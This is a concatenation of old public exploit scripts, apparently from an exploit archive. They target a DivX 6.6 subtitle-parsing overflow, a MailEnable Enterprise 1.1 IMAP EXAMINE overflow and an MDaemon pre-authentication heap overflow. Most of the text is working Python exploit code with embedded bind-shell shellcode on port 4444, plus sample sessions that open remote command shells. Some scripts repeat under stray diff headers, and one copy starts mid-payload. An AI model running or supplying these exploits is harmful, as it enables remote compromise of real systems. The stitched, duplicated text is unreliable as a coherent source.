"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)
f=open(file,'w')
f.write("1 \n")
f.write("00:00:01,001 --> 00:00:02,001\n")
f.write(bindshell)
f.close()
print "DivX 6.6 SEH SRT Overflow - PoC\n";
print "http://www.offensive-security.com/0day/divx66.py.txt\n";
print "SRT has been created - ph33r \n";
# milw0rm.com [2008-04-18]
#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#######################################################################
# file = name of avi video file
file="infidel.srt"
# Unicode friendly POP POP RET somewhere in DivX 6.6
# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
ret="\x94\x48"
# Align stack for register save
nudge="\x48\x6d"
# Payload building blocks
buffer="\x41" * 1032
xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
pushad="\x60\x6d" # Save stack registers,nop
pushfd="\x9c\x6d"
align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
popfd="\x9D\x6D" # popfd,nop
popad="\x61\x6D"# popad,nop
padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
rest= "\x01" * 5000000 # Buffer and shellcode canvas
# PoC Venetian Bindshell on port 4444 - ph33r
# Built on alternating 00 01 surface
# Venetian self decoding bindshell - 1580 bytes
bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
"\x40\x6D\x80\xBF\x6D\x40\x6D"
"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)
f=open(file,'w')
f.write("1 \n")
f.write("00:00:01,001 --> 00:00:02,001\n")
f.write(bindshell)
f.close()
print "DivX 6.6 SEH SRT Overflow - PoC\n";
print "http://www.offensive-security.com/0day/divx66.py.txt\n";
print "SRT has been created - ph33r \n";
# milw0rm.com [2008-04-18]


@ -1,136 +1,136 @@
#!/usr/bin/python
############################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
# jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
# * Talz - for helping me out with the 1st stage shellcode
#
# FOR EDUCATION PURPOSES ONLY!
############################################################
# 1st stage shellcode:
############################################################
# [BITS 32]
#
# global _start
#
# _start:
#
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
#
# ;--- copy eip into ecx
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch ; ecx=-256;
# dec ch ; ecx=-256;
# jmp ecx ; lets jmp ecx (current location - 512)
############################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#####################################################
import sys
import struct
import socket
from time import sleep
if len(sys.argv)!=5:
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
print "\nDiscovered / Coded by mati@see-security.com\n"
print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Return Address - Win2k SP4 jmp ebx
returnaddress = "\x66\x4a\x4e\x7c"
# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode
sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.com\n"
print "[+] Connecting to " + sys.argv[1]
try:
s.connect((sys.argv[1],int(sys.argv[2])))
except:
print "Could not connect to IMAP server!"
sys.exit(0)
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A001 EXAMINE ' + buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
# milw0rm.com [2005-12-19]
#!/usr/bin/python
############################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
# jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
# * Talz - for helping me out with the 1st stage shellcode
#
# FOR EDUCATION PURPOSES ONLY!
############################################################
# 1st stage shellcode:
############################################################
# [BITS 32]
#
# global _start
#
# _start:
#
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
#
# ;--- copy eip into ecx
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch ; ecx=-256;
# dec ch ; ecx=-256;
# jmp ecx ; lets jmp ecx (current location - 512)
############################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#####################################################
import sys
import struct
import socket
from time import sleep
if len(sys.argv)!=5:
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
print "\nDiscovered / Coded by mati@see-security.com\n"
print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Return Address - Win2k SP4 jmp ebx
returnaddress = "\x66\x4a\x4e\x7c"
# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode
sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.com\n"
print "[+] Connecting to " + sys.argv[1]
try:
s.connect((sys.argv[1],int(sys.argv[2])))
except:
print "Could not connect to IMAP server!"
sys.exit(0)
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A001 EXAMINE ' + buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
# milw0rm.com [2005-12-19]


@ -1,152 +1,152 @@
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
########################################################################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################
host="192.168.220.128"
